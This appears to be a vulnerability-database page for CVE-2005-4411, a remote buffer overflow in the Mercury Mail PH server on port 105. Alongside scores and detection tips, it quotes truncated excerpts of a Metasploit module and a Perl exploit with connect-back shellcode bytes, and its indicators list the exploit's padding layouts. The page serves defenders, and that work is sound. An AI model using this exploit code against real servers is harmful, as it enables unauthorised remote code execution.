CVE-2005-4411
published 2005-12-20CVE-2005-4411: Buffer overflow in Mercury Mail Transport System 4.01b allows remote attackers to execute arbitrary code via a long request to TCP port 105.
PriorityP260high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
64.66%
99.1th percentile
Buffer overflow in Mercury Mail Transport System 4.01b allows remote attackers to execute arbitrary code via a long request to TCP port 105.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| david_harris | mercury_mail_transport_system | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandsploit = rand_text_alphanumeric(224) + payload + \xeb\x06 + nops(2) + ret + [0xe8, -450].pack('CV') + \r\n↗
bytes↗
\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\xC2\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF
bytes↗
41 x 408 + shellcode + \x90\x90\xeb\x04 + ret + JJJJKKKKLLLLMMMMNNNNOOOOPPPP\xe9\x87\xfe\xff\xff
- →Detect oversized requests to TCP port 105 (Mercury PH Server); a buffer overflow is triggered by sending a payload of ~408+ bytes to this port. ↗
- →Look for the exploit's characteristic padding pattern: 408 'A' bytes followed by shellcode and the byte sequence \x90\x90\xeb\x04 on TCP port 105. ↗
- →The Metasploit module uses 224 bytes of alphanumeric padding before the payload on TCP port 105; alert on large single-line requests to port 105 containing this structure. ↗
- →Bad characters for this exploit are null byte, space, LF, and CR (\x00\x20\x0a\x0d); payloads on port 105 avoiding these bytes are suspicious. ↗
- →The exploit targets the Mercury/32 PH Server Module (stack-based buffer overflow); monitor for unexpected process spawning or network callbacks from the Mercury/32 process after connections on port 105. ↗
- ·The Metasploit module sets EXITFUNC to 'thread', meaning the exploit uses a thread exit stub; process-level crash detection may not fire on successful exploitation. ↗
- ·The Metasploit module requires a StackAdjustment of -3500, indicating the payload requires significant stack manipulation; standard stack-pivot detections may need tuning for this offset. ↗
- ·The standalone exploit (EDB-1375) XOR-encodes the callback IP and port with 0xC2 before embedding them in the shellcode; static shellcode signatures must account for this encoding. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Mercury/32 < 4.01b - PH Server Module Buffer Overflow (Metasploit)
exploitdb·2010-06-15
CVE-2005-4411 Mercury/32 < 4.01b - PH Server Module Buffer Overflow (Metasploit)
Mercury/32 'Mercury/32 %q{
This module exploits a stack-based buffer overflow in
Mercury/32 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9525 $',
'References' =>
[
[ 'CVE', '2005-4411' ],
[ 'OSVDB', '22103'],
[ 'BID', '16396' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
[ 'Windows 2000 Pro English ALL', { 'Ret' => 0x75022ac4 } ],
],
'Privileged' => true,
'DisclosureDate' => 'Dec 19 2005',
'DefaultTarget' => 0))
register_options([ Opt::RPORT(105)], self)
end
def exploit
connect
print_status("Trying target #{target.name}...")
sploit = rand_text_alphanumeric(224, payload_badc
Exploit-DB
Mercury Mail Transport System 4.01b - PH SERVER Remote Overflow
exploitdb·2005-12-16
CVE-2005-4411 Mercury Mail Transport System 4.01b - PH SERVER Remote Overflow
Mercury Mail Transport System 4.01b - PH SERVER Remote Overflow
---
### mercurysexywarez
### Okayokay THiS iS 0DAY!!!
### Mercury Mail Transport System 4.01b REMOTE ROOT EXPLOIT
### (PH SERVER)
### since me and my folks didn't find enough wild targets,
### i release this pretty warez to the public :PP
### kcope [kingcope(at)gmx.net] in 2005! JUUAREZ!
### Big thanx to blackzero,revoguard,qobaiashi,unf,secrew!
###################################################################
use IO::Socket;
# 316 bytes
$cbsc =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\xC2\xE2\xFA"
."\xEB\x05\xE8\xEB\xFF\xFF\xFF"
."\x2B\x39\xC2\xC2\xC2\x9D\xA6\x63\xF2\xC2\xC2\xC2\x49\x82\xCE\x49"
."\xB2\xDE\x6F\x49\xAA\xCA\x49\x35\xA8\xC6\x9B\x2A\x59\xC2\xC2\xC2"
."\x20\x3B\xAA\xF1\xF0\xC2\xC2\xAA\xB5\xB1\xF0\
Metasploit
Mercury/32 PH Server Module Buffer Overflow
metasploit
Mercury/32 PH Server Module Buffer Overflow
Mercury/32 PH Server Module Buffer Overflow
This module exploits a stack-based buffer overflow in Mercury/32 <= v4.01b PH Server Module. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer.
No writeups or analysis indexed.
http://secunia.com/advisories/18611http://securitytracker.com/id?1015374http://www.osvdb.org/22103http://www.securityfocus.com/bid/16396https://exchange.xforce.ibmcloud.com/vulnerabilities/23669https://www.exploit-db.com/exploits/1375http://secunia.com/advisories/18611http://securitytracker.com/id?1015374http://www.osvdb.org/22103http://www.securityfocus.com/bid/16396https://exchange.xforce.ibmcloud.com/vulnerabilities/23669https://www.exploit-db.com/exploits/1375
2005-12-20
Published